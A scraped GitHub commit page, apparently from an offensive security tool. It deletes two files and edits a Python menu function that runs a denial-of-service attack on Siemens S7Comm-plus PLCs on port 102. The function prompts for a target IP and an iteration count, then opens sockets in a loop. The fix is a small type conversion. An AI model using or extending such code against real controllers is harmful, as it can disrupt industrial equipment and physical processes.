File tree Expand file tree Collapse file tree 3 files changed +2
-33
lines changed Expand file tree Collapse file tree 3 files changed +2
-33
lines changed Load Diff This file was deleted.
Load Diff This file was deleted.
Original file line number Diff line number Diff line change @@ -116,8 +116,8 @@ def menuPandP():
116
116
print ("The only way to stop this attack is closing this programm or typing cntrl+C or waiting it to complete the iterations\n \n " )
117
117
118
118
IP = str (input ('Please, type in the destination IP: ' ))
119
- PORT = str (input ('Please, type in the S7Comm-plus port (default is 102 for Siemens): ' ))
120
- ITERS = str (input ('Please, type in the the number of tries the denial of service will run (equals running time): ' ))
119
+ PORT = int ( str (input ('Please, type in the S7Comm-plus port (default is 102 for Siemens): ' ) ))
120
+ ITERS = int ( str (input ('Please, type in the the number of tries the denial of service will run (equals running time): ' ) ))
121
121
122
122
for x in range (1 ,ITERS ):
123
123
s = socket .socket (socket .AF_INET , socket .SOCK_STREAM )
You can’t perform that action at this time.
0 commit comments